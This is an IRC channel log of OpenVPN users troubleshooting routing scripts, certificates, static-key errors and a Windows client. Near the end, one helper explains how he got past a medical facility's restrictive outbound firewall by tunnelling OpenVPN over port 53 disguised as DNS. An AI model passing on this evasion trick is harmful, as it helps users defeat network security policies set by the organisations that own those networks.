w/e the option is called 11:27 < jzaw> EugeneKay, and does one specify network by /64 ? cos for ipv4 you use 255.255.x.x 11:27 <@EugeneKay> TBQH I've not used 2.3 yet. 11:27 <@EugeneKay> I would suspect that you hand out from a /64, because that's the minimum IPv6 network size (per the RFCs, anyway) 11:28 < jzaw> for slaac yes 11:28 <@EugeneKay> For any network :-p 11:28 < jzaw> but for the endpoints you dont care 11:28 <@EugeneKay> It works just fine all the way down to a /126, but don't tell anybody that you're actually doing that. 11:28 < jzaw> its only going to use 2 ips or 4 11:29 <@EugeneKay> In any case, give it a go. What's the worst that could happen? ;-) 11:29 < jzaw> the world could cave in and disappear down a hole ? 11:29 < jzaw> :D 11:29 <@EugeneKay> It could be an improvement. 11:30 < jzaw> i cant argue with that 11:30 * EugeneKay goes back to GF+movie 11:30 < Dave2> Hey.
I'm trying to get OpenVPN 2.3 set up such that it'll not add any routes itself, letting my up script do that for me, but still pass the route_net_gateway variable through to my up script so that I can add the route in a separate table. Is there a way to do this that I've not found? As far as I can tell I can have the variable when it's adding routes for me, but not when I have route-nopull (which makes sense). 11:35 -!- Mcloven_ [~Mcloven@ppp203-122-218-215.static.internode.on.net] has joined #openvpn 11:35 -!- Mcloven [~Mcloven@ppp203-122-218-215.static.internode.on.net] has quit [Read error: Connection reset by peer] 11:37 <@dazo> Dave2: check out --route-nopull in the man page 11:38 < Dave2> dazo: route-nopull suppresses $route_net_gateway as far as I can tell, so I can't add the route myself 11:39 <@dazo> Dave2: have you tried --route-noexec + --route-up ? 11:40 * dazo actually confused --route-nopull with --route-noexec in his first comment 11:40 < Dave2> I have route-noexec set at the moment and that stops it from adding 0.0.0.0/1 and 128.0.0.0/1 routes, but it's still adding a route; would --route-up fix that? 11:42 < Dave2> (The route that it's adding isn't a default route, it's just for the subnet the VPN is on, but I still don't want that route) 11:42 <@dazo> Dave2: --route-up is to let your own script set up the routes .... and all pushed routes should then be available via env. variables 11:43 <@dazo> I'd probably just do the opposite ... let pushed routes be set up ... and then add a --route-up script (maybe with a --route-delay) to remove the unwanted route 11:43 <@dazo> at least if it's just one route or so 11:45 < Dave2> I was considering doing that, but I don't think I can see the subnet in an env variable passed to route-up, so it's a little more complex. (Unless there's an easy way to delete all routes relating to $dev, I might look at that.) 11:47 <@dazo> You mean, that push route you don't want isn't static?
11:48 < Dave2> It probably is static per VPN provider, but I'm trying to be generic as this will end up using more than one 11:48 <@dazo> ah, okay 11:48 <@dazo> then I think --route-up + --route-noexec is the solution ... all routes should be sent to the script via env.variables, iirc ... so you need to parse them 11:52 < Dave2> Oh, I see what I'm doing wrong, I'm looking for CIDR and completely skipping past the netmask 11:55 -!- xbanux [~xbanux@triband-mum-59.182.161.92.mtnl.net.in] has quit [Read error: Connection reset by peer] 11:55 -!- xbanux [~xbanux@triband-mum-59.182.139.230.mtnl.net.in] has joined #openvpn 12:03 -!- AsadH is now known as zz_AsadH 12:09 -!- z0ttel [~ident@2a01:4f8:100:7ffe:2::2] has joined #openvpn 12:09 < z0ttel> hi 12:10 -!- md_5 [~md_5@mcdevs/trusted/md-5] has quit [Quit: ZNC - http://znc.in] 12:11 -!- newbie|3 [~tjz@bb219-74-189-54.singnet.com.sg] has quit [Read error: Connection reset by peer] 12:12 -!- tjz [~tjz@unaffiliated/tjz] has joined #openvpn 12:12 < z0ttel> I just switched from TinyCA to easyrsa for my pki management 12:13 -!- tjz [~tjz@unaffiliated/tjz] has quit [Read error: Connection reset by peer] 12:13 < z0ttel> And tried to create server certificates that could be used for openvpn clients 12:13 < z0ttel> (nsCertType = server, client) 12:13 < z0ttel> a certificate dump with openssl confirms that setting, but I keep getting an error on connection: http://npaste.de/p/xA/ 12:14 -!- tjz [~tjz@unaffiliated/tjz] has joined #openvpn 12:14 < z0ttel> are there other options I have to set or am I missing something else? 
12:17 -!- mirco [~mirco@pd95b6029.dip0.t-ipconnect.de] has quit [Quit: mirco] 12:19 -!- TheWarden [~chatzilla@S0106e0469a3d83ef.ss.shawcable.net] has joined #openvpn 12:19 -!- kubbing [~kubbing@89.177.146.18] has joined #openvpn 12:23 < z0ttel> I guess I'll give clientAuth a try 12:25 -!- vraa__ [~speed_rac@c-76-30-149-251.hsd1.tx.comcast.net] has joined #openvpn 12:27 -!- speed_racer8 [~speed_rac@c-76-30-149-251.hsd1.tx.comcast.net] has quit [Ping timeout: 276 seconds] 12:30 < z0ttel> okay - that did it - thank you anyway - ciao :) 12:30 -!- z0ttel [~ident@2a01:4f8:100:7ffe:2::2] has left #openvpn [] 12:33 -!- MeanderingCode [~Meanderin@71-213-186-243.albq.qwest.net] has joined #openvpn 12:37 -!- md_5 [md_5@mcdevs/trusted/md-5] has joined #openvpn 12:41 -!- speed_racer8 [~speed_rac@c-76-30-149-251.hsd1.tx.comcast.net] has joined #openvpn 12:44 -!- vraa__ [~speed_rac@c-76-30-149-251.hsd1.tx.comcast.net] has quit [Ping timeout: 256 seconds] 12:45 -!- brute11k [~brute@89.249.235.173] has quit [Ping timeout: 245 seconds] 12:46 -!- brute11k [~brute@89.249.235.42] has joined #openvpn 12:47 -!- kubbing [~kubbing@89.177.146.18] has quit [Remote host closed the connection] 12:52 -!- xbanux [~xbanux@triband-mum-59.182.139.230.mtnl.net.in] has quit [Read error: Connection reset by peer] 12:52 -!- xbanux [~xbanux@triband-mum-59.182.156.145.mtnl.net.in] has joined #openvpn 12:55 -!- JSharpe [~JSharpe@146.185.24.18] has quit [Ping timeout: 245 seconds] 12:56 -!- kls [~kls@198.211.125.123] has joined #openvpn 12:57 < kls> hello 12:58 -!- kyrix [~ashley@85-126-76-82.work.xdsl-line.inode.at] has quit [Quit: Ex-Chat] 12:58 -!- kls [~kls@198.211.125.123] has quit [Client Quit] 13:06 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has quit [Ping timeout: 264 seconds] 13:12 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn 13:13 -!- kyrix [~ashley@85-126-76-82.work.xdsl-line.inode.at] has joined #openvpn 13:14 -!- tjz [~tjz@unaffiliated/tjz] has quit [Read error: 
Connection reset by peer] 13:14 -!- tjz [~tjz@unaffiliated/tjz] has joined #openvpn 13:20 -!- kubbing [~kubbing@89.177.146.18] has joined #openvpn 13:34 -!- hatschi [~marvin@dslb-178-010-198-195.pools.arcor-ip.net] has joined #openvpn 13:42 -!- zz_AsadH is now known as AsadH 13:46 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has quit [Ping timeout: 248 seconds] 13:49 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has joined #openvpn 13:50 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has quit [Ping timeout: 258 seconds] 13:52 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has joined #openvpn 14:03 -!- vraa__ [~speed_rac@c-76-30-149-251.hsd1.tx.comcast.net] has joined #openvpn 14:07 -!- speed_racer8 [~speed_rac@c-76-30-149-251.hsd1.tx.comcast.net] has quit [Ping timeout: 256 seconds] 14:18 -!- JSharpe [~JSharpe@web.sinexdigitalrecovery.com] has joined #openvpn 14:19 -!- vraa__ [~speed_rac@c-76-30-149-251.hsd1.tx.comcast.net] has quit [Ping timeout: 264 seconds] 14:27 -!- MeanderingCode [~Meanderin@71-213-186-243.albq.qwest.net] has quit [Remote host closed the connection] 14:34 -!- MeanderingCode [~Meanderin@71-213-186-243.albq.qwest.net] has joined #openvpn 14:56 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has quit [Ping timeout: 245 seconds] 15:02 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has joined #openvpn 15:03 -!- TommehM [~TomM@unaffiliated/tommehm] has quit [Quit: ZNC - http://znc.in] 15:09 -!- TommehM [~TomM@unaffiliated/tommehm] has joined #openvpn 15:09 -!- hatschi [~marvin@dslb-178-010-198-195.pools.arcor-ip.net] has quit [Quit: hatschi] 15:12 -!- ade_b [~Ade@redhat/adeb] has joined #openvpn 15:39 -!- erry is now known as errietta 15:40 -!- master_of_master [~master_of@p4FF24801.dip.t-dialin.net] has joined #openvpn 15:44 -!- master_o1_master [~master_of@p4FF24BF8.dip.t-dialin.net] has quit [Ping timeout: 255 seconds] 15:48 -!- xbanux [~xbanux@triband-mum-59.182.156.145.mtnl.net.in] has quit [Ping timeout: 264 
seconds] 15:49 -!- master_o1_master [~master_of@p4FF24695.dip.t-dialin.net] has joined #openvpn 15:49 -!- ade_b [~Ade@redhat/adeb] has quit [Ping timeout: 256 seconds] 15:49 -!- dazo is now known as dazo_afk 15:53 -!- master_of_master [~master_of@p4FF24801.dip.t-dialin.net] has quit [Ping timeout: 264 seconds] 15:56 -!- Shway [~Shway@216.208.252.66] has joined #openvpn 15:57 -!- Shway [~Shway@216.208.252.66] has left #openvpn [] 16:01 -!- brute11k [~brute@89.249.235.42] has quit [Quit: Leaving.] 16:02 -!- ade_b [~Ade@redhat/adeb] has joined #openvpn 16:04 -!- Orbi [~opera@anon-186-54.vpn.ipredator.se] has joined #openvpn 16:18 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has joined #openvpn 16:21 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Quit: Computer has gone to sleep.] 16:30 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn 16:30 -!- mallxs [~mallxs@84.246.31.190] has joined #openvpn 16:34 -!- marksaitis [~marksaiti@cpc4-rdng22-2-0-cust932.15-3.cable.virginmedia.com] has joined #openvpn 16:36 < mallxs> Hi i have an up and running openvpn between a debian and a rhel using a static.key .. on the rhel side it keeps complaining: Authenticate/Decrypt packet error: bad packet ID 16:36 < mallxs> any idea where i should start looking ? 16:38 < pekster> mallxs: Verify the key file is the same, you've properly configured the direction option to the --secret parameter, and that your --comp-lzo usage matches exactly on both sides, down to the optional parameter on it 16:38 < mallxs> pekster: thx will go look 16:42 < mallxs> pekster: lzo is not enabled (yet) and in the conf i have only "secret static.key" as option 16:42 < pekster> You have 2 configs (one at each end.) Tell you what, how about you just pastebin them?
16:42 < pekster> !paste 16:42 <@vpnHelper> "paste" is "pastebin" is (#1) please paste anything with more than 5 lines into pastebin or a similar website or (#2) https://gist.github.com is a recommended place to use 16:42 < pekster> Oh, and we have some nice grep magic to rip out comments/blanks: 16:42 < pekster> !configs 16:42 <@vpnHelper> "configs" is (#1) please pastebin your client and server configs (with comments removed, you can use `grep -vE '^#|^;|^$' server.conf`), also include which OS and version of openvpn. or (#2) dont forget to include any ccd entries or (#3) on pfSense, see http://www.secure-computing.net/wiki/index.php/OpenVPN/pfSense to obtain your config 16:43 < pekster> !learn pastebin as If you're pasting config files, see !configs for grep syntax to remove comments 16:43 <@vpnHelper> Joo got it. 16:45 -!- Orbi [~opera@anon-186-54.vpn.ipredator.se] has left #openvpn [] 16:45 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Quit: Computer has gone to sleep.] 16:49 < Rienzilha> anyone 16:49 < Rienzilha> whops 16:49 < Rienzilha> disregard that 16:57 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has joined #openvpn 16:58 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has joined #openvpn 16:58 < mallxs> pekster: http://pastebin.com/zz6t3sFX 16:59 < mallxs> it's now there 17:02 -!- robert_ [~hellspawn@objectx/robert] has joined #openvpn 17:02 < pekster> No ping on the server side, but that doesn't matter if you're not using ping-restart anyway. Should be fine, provided your key matches (did you checksum it to verify it matches?) 17:03 < pekster> Oh, 2.1... I'm not sure what its default is for comp-lzo actually 17:03 < pekster> That's a rather old version 17:03 < mallxs> Not yet but i do have a connection and do a ssh to the other machine .. would be bad if the didn't match and it still worked 17:04 < mallxs> s/the/they/ 17:05 < pekster> Right (well, sort of.
It doesn't use the entire key file unless you're using the longest keyed cipher in bi-directional mode. You're doing neither 17:05 < mallxs> pekster: the 2.1 i will fix .. move to a newer machine ... can you point me to a read for the key direction thing ? 17:06 < mallxs> for the key i did opencpn --genkey static 17:06 < mallxs> minus the typo's 17:07 < pekster> See --secret in the manpage. Basically, you just add a 2nd parameter of '0' and '1' to each end (they must be opposite) 17:07 < pekster> It's more secure since it uses 4 keys: one in each direction for HMAC and encryption 17:08 < mallxs> so i go into the static.key file and add the 0 & 1 ? 17:09 < pekster> Hmm, I just checked the 2.1.3 manpage, and 'comp-lzo adaptive' is the default when unspecified. You can try adding a matching directive to each end, but that shouldn't be your issue 17:09 < pekster> No, you add it to the config file 17:09 < pekster> There's an entire section on that in the manpage 17:09 < pekster> Search for the string '--secret' 17:10 -!- errietta is now known as erry 17:12 -!- ade_b [~Ade@redhat/adeb] has quit [Ping timeout: 245 seconds] 17:19 -!- sysdoc [~sysdoc@pool-71-105-40-229.lsanca.dsl-w.verizon.net] has joined #openvpn 17:21 < mallxs> ok thx pekster fixed the secret and now i have a connection, i copied the key again . 17:23 < mallxs> but i did not fix the Authenticate/Decrypt packet error: bad packet ID in my syslog, may that be due to firewalls? there are lot of cisco between the machines 17:24 -!- AsadH is now known as zz_AsadH 17:24 < mallxs> and a linux firewall-iptables / router 17:24 < pekster> Only if this "firewall" is editing packet data. That's likely not your problem 17:25 < mallxs> ok thx for the help ..
i only then have to cleanup my syslog more frequent 17:25 < pekster> I'd still try what I suggest a while back; add an explicit --comp-lzo option with your choice of parameter to both ends such that they match 17:26 < mallxs> yes did that have set them to yes on both sides 17:28 -!- zz_AsadH is now known as AsadH 17:29 < mallxs> o btw pfSense what is that? i followed the link you gave me but there was no install talk or how to get it ? 17:31 -!- speed_racer8 [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has joined #openvpn 17:44 -!- JackWinter1 [~jack@ppp-256.vo.lu] has quit [Quit: ZNC - http://znc.in] 17:46 -!- JackWinter [~jack@ppp-256.vo.lu] has joined #openvpn 17:50 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has quit [Ping timeout: 252 seconds] 17:53 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has joined #openvpn 17:54 -!- kubbing [~kubbing@89.177.146.18] has quit [Read error: Operation timed out] 17:57 -!- kubbing [~kubbing@89.177.146.18] has joined #openvpn 17:58 -!- JackWinter1 [~jack@ppp-256.vo.lu] has joined #openvpn 17:58 -!- marksaitis [~marksaiti@cpc4-rdng22-2-0-cust932.15-3.cable.virginmedia.com] has quit [Quit: Leaving] 18:01 -!- JackWinter [~jack@ppp-256.vo.lu] has quit [Ping timeout: 272 seconds] 18:05 -!- TheWarden [~chatzilla@S0106e0469a3d83ef.ss.shawcable.net] has quit [Quit: ChatZilla 0.9.90 [Firefox 19.0.2/20130307023931]] 18:10 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has quit [Ping timeout: 246 seconds] 18:16 -!- Wulf [~Wulf@unaffiliated/wulf] has quit [Ping timeout: 264 seconds] 18:28 -!- kubbing [~kubbing@89.177.146.18] has quit [Remote host closed the connection] 18:39 -!- Poster [~poster@cpe-184-57-119-105.columbus.res.rr.com] has joined #openvpn 18:46 -!- sysdoc [~sysdoc@pool-71-105-40-229.lsanca.dsl-w.verizon.net] has quit [Quit: Leaving] 18:47 -!- roconnor [~roconnor@69.166.22.226] has joined #openvpn 18:47 < roconnor> !welcome 18:47 <@vpnHelper> "welcome" is (#1) Start by stating your goal, such as 'I would 
like to access the internet over my vpn' || new to IRC? see the link in !ask || we may need !logs and !configs and maybe !interface to help you. || See !howto for beginners. || See !route for lans behind openvpn. || !redirect for sending inet traffic through the server. || Also interesting: !man !/30 !topology !iporder !sample !forum 18:47 <@vpnHelper> !wiki !mitm or (#2) Don't use 192.168.1.0/24 or 192.168.0.0/24 (too much potential for conflict) 18:51 < roconnor> !mitm 18:51 <@vpnHelper> "mitm" is (#1) http://openvpn.net/index.php/documentation/howto.html#mitm to know about stopping Man-in-the-Middle attacks by signing the server cert specially or (#2) use !servercert to generate the server cert manually or use the easy-rsa build-key-server script to build your server certificates or (#3) then use: remote-cert-tls server in the client config 18:51 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has quit [] 18:59 -!- kyrix [~ashley@85-126-76-82.work.xdsl-line.inode.at] has quit [Quit: Ex-Chat] 19:00 -!- raidz is now known as raidz_away 19:01 -!- roconnor [~roconnor@69.166.22.226] has quit [Read error: Operation timed out] 19:01 -!- roconnor [~roconnor@e120-pool-d89a65c3.brdbnd.voicenetwork.ca] has joined #openvpn 19:01 -!- AsadH is now known as zz_AsadH 19:03 -!- roconnor [~roconnor@e120-pool-d89a65c3.brdbnd.voicenetwork.ca] has left #openvpn [] 19:05 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has quit [Ping timeout: 245 seconds] 19:06 -!- speed_racer8 [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has quit [Ping timeout: 245 seconds] 19:30 -!- njbair [~njbair@user-12l369d.cable.mindspring.com] has joined #openvpn 19:32 < njbair> I've got a working tap client/server config which I am able to launch from the CLI (using sudo, anyway). I've installed the desktop windows client on another machine and loaded the same config. But the client just gets stuck on "connecting..." and the server logs show no connection attempts being made. 
Any ideas what's wrong? 19:38 < Poster> Is the server running UDP or TCP? 19:39 < njbair> UDP 19:39 < Poster> Does netstat on the server show the expected UDP listener on the correct port? 19:40 < njbair> I haven't checked, but as I said the config works from a Linux box on the command line 19:41 < Poster> well that's a start, try verifying via netstat the UDP listener is where you expect 19:41 < Poster> it sounds like you might have some packet filtering between the client and server 19:42 < njbair> hmm, I don't see it there 19:42 < njbair> server is a DD-WRT router, BTW 19:42 < Poster> ok you might have iptables in play there 19:43 < Poster> when you launch the openvpn daemon from the DD-WRT, are you putting it in the background with the --daemon switch? 19:44 < njbair> not explicitly, not sure what the default is 19:45 < njbair> ok 19:45 < njbair> ps | grep openvpn shows it was launched with --daemon 19:45 < Poster> when you start via sudo, without daemon, it will launch in foreground 19:45 < Poster> ok it typically is when called via init script 19:45 < Poster> do you have lsof? 19:45 < njbair> no 19:45 < Poster> how about netstat -an | grep UDP 19:46 < njbair> you understand that when I talked about launching with sudo, I was talking about a client, right? 19:46 < njbair> there it is, on 1194 19:46 < Poster> ok I took it the client was a windows host 19:46 < njbair> I have two clients 19:47 < njbair> the linux client works via CLI, the windows client hangs on "connecting..." 19:47 < Poster> oh, ok, is there some type of firewall on the windows host? 19:47 < njbair> lemme check if Windows Firewall is enabled... 19:48 < Poster> are the working Linux host and the Windows host inside the same subnet? 19:49 < njbair> Yes...in fact, the windows host is a bridged VM inside of the Linux host.
19:49 < njbair> my local router sees them both as unique IPs 19:49 < njbair> I just disabled Windows Firewall and I still can't connect 19:50 < Poster> is the Linux host currently connected? 19:50 < njbair> no 19:52 < Poster> are you referencing the DD-WRT by name or IP address? 19:52 < njbair> name 19:52 < Poster> can you ping it by name? 19:52 < njbair> no but that's because ping is disabled on the router. But I can connect via web/ssh via name 19:53 < Poster> can you load the server configuration on the host Linux system and connect there? 19:53 < njbair> I haven't tried that... 19:53 < Poster> you might also be able to use tcpdump on the Linux host 19:54 < Poster> if your LAN adapter is eth0, something like 19:54 < Poster> sudo tcpdump -i eth0 port 1194 19:55 < njbair> well hey now, this is weird. 19:56 < njbair> I'm not running the server locally yet 19:56 < njbair> but I just invoked tcpdump 19:56 < Poster> I am assuming your virtualization software is bridging your LAN adapter 19:56 < njbair> and I got a bunch of packets from the remote server 19:57 < njbair> yes, it's bridged 19:57 < Poster> remote server being the DD-WRT address? 19:57 < njbair> yes 19:57 < Poster> is the other IP address that of the Windows system? 19:58 < njbair> no, it's the linux host where I ran the tcpdump 19:58 < njbair> but that was it 19:58 < njbair> nothing more since then 19:59 < Poster> ok so can you validate that the openvpn daemon is not running on the Linux host? 
19:59 < njbair> yes 19:59 < njbair> nothing in output of ps 19:59 < njbair> tcpdump shows nothing when I try to connect from the windows host 20:00 < Poster> ok try this, from the Windows host 20:00 < Poster> telnet dd-wrt 1194 20:00 < Poster> it will invoke a TCP connection, but should be captured by the tcpdump 20:00 < njbair> hmm, no telnet in win7 apparently 20:00 < njbair> this is home edition 20:01 < njbair> better go get putty 20:01 < Poster> Little rusty on Windows 7, it's optional I think 20:01 < Poster> I don't remember if it's a feature or add/remove programs windows component 20:02 < njbair> putty works 20:02 < Poster> ok so you're seeing the 1194 TCP connection via tcpdump with the correct source address? 20:02 < njbair> windows host sent three packets, then timed out 20:02 < njbair> each about 5secs apart 20:02 < Poster> ok that's probably right 20:03 < Poster> had the S flag in tcpdump 20:03 < njbair> yep 20:03 < Poster> ok just to test can you completely disable the Windows firewall? 20:04 < Poster> if tcpdump is not showing UDP frames originating from the Windows host, it's not likely leaving the Windows host 20:04 < njbair> disabled, still not connecting and nothing in tcpdump 20:04 < njbair> should I see a tap adapter in my network adapters? 20:04 < njbair> because I don't 20:05 < Poster> yep 20:05 < Poster> though I think the tap adapter isn't invoked until the session is established 20:05 < njbair> it should still be there even if it's not being used, i think 20:05 < Poster> when you installed OpenVPN, were you prompted to install the TAP adapter? 20:06 < Poster> I believe it's unsigned so you're asked 20:06 < njbair> yes 20:06 < njbair> but it's not there 20:06 < Poster> might be disabled, try start -> run -> ncpa.cpl 20:06 < njbair> wait there it is 20:07 < Poster> can you temporarily change the server from UDP to TCP? 
20:07 < njbair> yeah hang on 20:09 < njbair> no change 20:09 < njbair> linux host works over TCP, though 20:10 < Poster> ok using putty on the windows host, running tcpdump on the Linux host, try using putty and point it to the DD-WRT port 1194 20:10 < Poster> you should see the connection on tcpdump 20:10 < Poster> be sure to update the openvpn configuration on the windows host to use TCP 20:11 < njbair> did that 20:12 -!- speed_racer8 [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has joined #openvpn 20:12 < Poster> ok are you seeing traffic via tcpdump ? 20:12 < njbair> ok, telnet exited cleanly, saw a few packets on the dump 20:13 < Poster> actually, are you starting the OpenVPN daemon on windows 7 as an administrator? 20:13 < njbair> no 20:13 < Poster> give that a shot 20:14 < njbair> no change 20:14 < Poster> ok so using putty, on the windows host, putting it in telnet mode, setting the destination host as the DD-WRT and the port of 1194, you do see the traffic on the Linux host running tcpdump? 20:15 < njbair> yes. 9 packets, back and forth 20:15 < njbair> err 9 lines 20:18 < Poster> ok and when you're doing this in putty, for the host are you using the hostname for the DD-WRT or IP address? 20:18 < njbair> just for kicks, I tried changing it to dev tun, no change. no traffic on tcpdump 20:18 < njbair> hostname, always 20:18 < Poster> I don't think we're getting that far yet 20:19 < Poster> I am fairly sure you have to connect and pass authentication before the daemon tries to bring in the TAP adapter 20:19 < njbair> I'm booting an XP machine to see if that can connect 20:25 < njbair> that's not going to work...I don't have .NET and don't want to install it now 20:27 < Poster> I didn't think it needed .NET framework 20:27 < njbair> the desktop client deos 20:27 < njbair> *does 20:28 < njbair> unless there is another way to connect a windows machine? 
20:29 < Poster> I guess I've always had a few flavors, but I never knew of that dependency 20:30 < njbair> What about the package at the bottom of this page: http://openvpn.net/index.php/download.html 20:30 <@vpnHelper> Title: Downloads (at openvpn.net) 20:30 -!- amir [~amir@unaffiliated/amir] has quit [Read error: Operation timed out] 20:31 < Poster> I think you're looking at access server 20:31 < Poster> try http://openvpn.net/index.php/open-source/downloads.html 20:31 -!- amir [~amir@unaffiliated/amir] has joined #openvpn 20:31 <@vpnHelper> Title: Community Downloads (at openvpn.net) 20:31 < njbair> Is it just me, or is there no menu link to the clients? 20:32 < Poster> they're one and the same 20:32 < njbair> well then 20:33 < Poster> the binary can be a server or client, it depends on the configuration you point it to 20:33 < njbair> I see 20:33 < njbair> I think I was using the wrong package 20:34 < Poster> I've never tried the access server, I am guessing it helps with administration or setup 20:34 < njbair> Look here: https://openvpn.net/index.php?option=com_content&id=357 20:34 <@vpnHelper> Title: Client Packages (at openvpn.net) 20:34 < njbair> That's what I've been using 20:35 < Poster> ok yeah I don't know much about those 20:35 < Poster> I've always used the community flavor 20:36 < njbair> I just installed community 20:36 < njbair> OpenVPN GUI is running now, but where do I configure it?
20:36 < Poster> OpenVPN GUI is just a wrapper to start and stop
20:37 < Poster> it reads for *.ovpn in either C:\Program Files\OpenVPN\config or C:\Program Files (x86)\OpenVPN\config
20:37 < njbair> Ok I right-clicked my config file and clicked "Run OpenVPN on this config"
20:37 < Poster> then gives you point and click to connect/disconnect, I think configure a proxy, etc
20:37 < njbair> now I'm connected
20:38 < njbair> ha
20:38 < njbair> what the heck is that other client package
20:38 < njbair> I guess that's why there's no menu item for it
20:39 < Poster> I really have no idea =[
20:40 < njbair> so where should I store my keys and cert files?
20:40 < Poster> you can keep them anywhere, I usually place them with or near my configuration file
20:41 < Poster> in C:\Program Files\OpenVPN\config or C:\Program Files (x86)\OpenVPN\config
20:41 < Poster> but you can specify a full path in your configuration
20:41 -!- MeanderingCode [~Meanderin@71-213-186-243.albq.qwest.net] has quit [Ping timeout: 245 seconds]
20:41 < Poster> if you wanted to split them for security reasons
20:41 < Poster> put the config and cert on one drive, then carry the key on a USB disk or something
20:43 < njbair> we've got plenty of secure transmission options. I just wasn't sure if there was a convention for that.
20:43 < njbair> Is there a config option for a friendly name?
20:43 < Poster> friendly name for the VPN connection?
20:43 < njbair> yea
20:44 < Poster> in my experience, it just takes the name of the configuration file
20:44 < Poster> so foo.ovpn would show up as "foo"
20:44 < njbair> ok
20:46 < njbair> wow that is really easy
20:46 < njbair> (once you install the right client software, that is)
20:46 < njbair> well hey, I owe you a big thanks for your patience and willingness to help
20:47 < Poster> yeah I like it quite a bit, I use it on Windows/BSD/Linux with great success
20:47 -!- master_of_master [~master_of@p4FF245E4.dip.t-dialin.net] has joined #openvpn
20:47 < njbair> ever play with it on mobile?
20:47 < Poster> I have not, I don't do a lot of mobile outside of email/web/text
20:48 < njbair> as I understand it, Android doesn't work with TAP (it's a root access thing)
20:48 < Poster> yeah I thought it required a rooted phone
20:49 < njbair> You basically need TAP for a windows environment, I would think
20:50 < Poster> yep, you install the adapter
20:50 < Poster> you can install multiple as well, I have remote hosts I manage with 4 adapters running unique connections on each
20:50 < Poster> makes administration a breeze
20:50 < njbair> wow
20:50 -!- master_o1_master [~master_of@p4FF24695.dip.t-dialin.net] has quit [Ping timeout: 260 seconds]
20:50 < Poster> most are behind NAT of some type at remote locations
20:51 < Poster> I use the link made to me to go back through to access services, works out real well
20:51 < njbair> do you run any other VPNs?
20:51 < Poster> not personally no
20:51 < njbair> (IPSEC, PPTP)
20:52 < Poster> I did use freeswan awhile back
20:52 -!- MeanderingCode [~Meanderin@71-213-186-243.albq.qwest.net] has joined #openvpn
20:52 < Poster> somewhere along the lines I discovered OpenVPN and have not gone back since
20:52 < njbair> We've been running PPTP for the office because it's so easy to set up. But it's old, buggy, and insecure.
20:52 < Poster> yeah I wouldn't recommend it
20:52 < njbair> I may have to keep it set up for mobile access
20:53 < njbair> just for when our staff are, say, at the airport and need a secure tunnel
20:53 < Poster> OpenVPN can be good for restrictive firewalls too
20:53 < Poster> I was recently in a medical facility that only allowed 53, 80 and 443 out
20:53 < Poster> I was able to leverage an OpenVPN daemon on 53 then tunnel all my traffic through the remote host
20:54 < njbair> how did you get out on 53?
20:54 < Poster> set the OpenVPN client and server to use 53/udp
20:54 < Poster> most firewalls will think it's DNS traffic
20:54 < Poster> unless it's intelligent and actually proxies DNS queries, but most places are not that secure
20:55 < Poster> you can do the same putting it on 80 or 443
20:55 < njbair> what's the difference between using UDP and TCP?
20:55 < Poster> it's the transport that OpenVPN uses
20:56 < Poster> UDP is a bit lighter, does not have TCP overhead
20:56 < njbair> so then faster
20:56 < Poster> but TCP is generally NAT friendly
20:56 < Poster> yep
20:56 < njbair> what about encryption? Should I be concerned about blowfish? I've heard mixed opinions
20:56 < Poster> UDP can have trouble through NAT though, since UDP is stateless, connection tracking is sort of "best effort" where it looks for matching return traffic
20:57 < Poster> I've run into several cases where I am using UDP behind a consumer grade NAT router
20:57 < Poster> and it would lose state and the connection would die
20:57 < Poster> TCP is pretty much immune since it has a handshake and sequencing numbers
20:57 < njbair> right
20:57 < njbair> I guess I'll try UDP and if it's flaky I can change it
20:58 < Poster> yeah it's going to be slightly faster
20:58 < njbair> have you ever benchmarked different ciphers?
20:58 < Poster> not a whole lot
20:58 < Poster> I did bury a 400 MHz system trying to pass VoIP traffic though
20:59 < Poster> that was awhile ago
20:59 < njbair> heh
20:59 -!- nonotza [~nonotza@rrcs-50-74-239-162.nyc.biz.rr.com] has joined #openvpn
21:00 < njbair> wow
21:01 < njbair> I'm getting 15Mbps down through this baby
21:01 < Poster> I've not done anything too heavy
21:01 < Poster> but until I implemented virtualization I ran about a dozen OpenVPN links on a Pentium Pro 200 MHz with 64MB of memory
21:02 < njbair> yeah, it seems really lightweight and fast
21:02 < Poster> now the CPU is much faster, but the memory is the same
21:02 < Poster> I keep the PPro200s around though
21:02 < Poster> they are pretty lean and low power
21:03 < Poster> no fan on the CPU
21:03 < njbair> If OpenVPN can run this fast on an Atheros chip, I'm wondering if it's been ported to ARM for the Raspberry Pi
21:03 < Poster> I would imagine so
21:04 < njbair> Imagine, VPN'ing everywhere you go for $35/ea
21:04 < Poster> its portability is great
21:04 < Poster> I am not sure about a second ethernet adapter, I have heard that USB on the Pi can be hit or miss
21:04 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has quit [Remote host closed the connection]
21:05 < njbair> You don't need one
21:05 < Poster> I think I am missing your idea
21:05 < njbair> Just tell the firewall to redirect all port 1194 traffic to the VPN IP
21:05 < Poster> oh, yeah you could do that
21:06 < Poster> if you want to be able to pierce most firewalls you might want to do one UDP listener and TCP listener
